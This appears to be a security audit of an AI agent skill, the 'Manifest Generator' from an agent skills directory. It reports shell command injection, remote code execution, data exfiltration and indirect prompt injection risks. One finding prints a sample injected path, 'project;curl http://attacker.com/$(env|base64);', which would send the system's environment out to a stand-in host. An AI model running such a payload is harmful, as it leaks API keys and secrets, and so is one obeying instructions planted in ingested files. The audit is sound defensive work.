The Agent Skills Directory

COMMAND_EXECUTION (HIGH): The script generate-manifest.sh is vulnerable to shell command injection. The variable $RESOURCE_NAME, derived directly from the user-controlled --path input via the basename command, is used in an unquoted file redirection: > /tmp/manifest-$RESOURCE_NAME.yaml. An attacker can provide a skill_path such as project;curl http://attacker.com/$(env|base64); to execute arbitrary commands and exfiltrate data.
REMOTE_CODE_EXECUTION (HIGH): The command injection vulnerability allows an attacker to execute arbitrary code with the privileges of the agent running the skill. This can be used to install backdoors, download malicious payloads, or pivot to other systems.
DATA_EXFILTRATION (HIGH): Using the command injection, an attacker can easily exfiltrate the OPENAI_API_KEY (required as a precondition) or other sensitive configuration files found on the system.
PROMPT_INJECTION (LOW): The skill is vulnerable to Indirect Prompt Injection (Category 8) because it ingests untrusted data from local files and passes it to an LLM without sanitization.
Ingestion points: SKILL.md, index.js, and index.ts files located within the user-provided skill_path.
Boundary markers: None. The content is interpolated directly into the Codex prompt template without delimiters or instructions to ignore nested instructions.
Capability inventory: The skill can write files (cp), execute shell commands, and interact with the Codex API.
Sanitization: No sanitization or escaping is performed on the ingested file content before it is sent to the LLM.

Manifest Generator